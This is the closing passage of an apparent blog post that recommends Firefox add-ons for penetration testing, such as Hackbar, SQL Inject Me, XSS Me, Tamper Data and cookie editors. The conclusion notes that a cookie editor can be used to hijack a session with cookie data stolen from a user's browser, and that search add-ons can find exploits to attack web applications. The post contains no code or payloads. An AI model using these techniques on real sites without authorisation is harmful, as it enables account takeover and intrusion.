Installation of these add-ons in the Firefox browser is really simple. I added links of each Add-on to make installation easier. Just follow the link, and you will land on the add-on page. Find the big “download” button to start downloading. In the next page, you will find terms and conditions. Just below that, you will see the “accept and install” button. Then it will open a pop-up and installation begins in 3 seconds. After installation is complete, you will need to restart the browser. Everything is just a click away. I am not describing the process with screenshots because I assume that you already know how to install add-ons in Mozilla Firefox.

LEARN PENETRATION TESTING FROM TOP HACKERSLEARN PENETRATION TESTING FROM TOP HACKERS

Conclusion

Firefox is not only a nice browser, but also a friend of penetration testers and security researchers. With the given Add-ons, you can enhance the functionality of Firefox in the way that is useful for the penetration testing process. Some of these tools help in gathering information about a website and its servers. A few other tools help in intercepting and modifying header information, to perform attacks via headers. In case you are trying to perform session hijacking, you can use an add-on to edit the cookies with the cookie data stolen from a user’s browser. SQL Inject ME, XSS Me and Websecurify are semi-automated tools to scan the page, and find the vulnerabilities that may be on the website. These 3 tools are dedicated security tools with a good success rate. We have covered WebSecurify in earlier posts. You can read more about the tool to know how it actually works. Hackbar is the best tool when you want to test a form against Post XSS. Hackbar helps you to manually submit a form to send POST data. If the app has client side validation in form, and has few limits in length and input, you can use Hackbar to submit form data manually and see the effect. It also has encoding tools to encode your XSS payloads, without using any separate tool. Most of the people involved in the security testing field use this tool.

Few tools are just search add-ons that can help you to search exploits and advisories from popular databases. You can use these add-ons to find the appropriate exploit to perform an attack on the web application, to check whether the app is affected with this known exploit or not.

I am sure you will like few of these add-ons and will use them in your security testing process.

I personally use Hackbar, SQL Inject Me, XSS me, WebSecurify, Add N Edit Cookies, Live HTTP Headers, Tamper data, FoxyProxy standard and Firebug.

Which add-on you would like to use? Share your views via comments.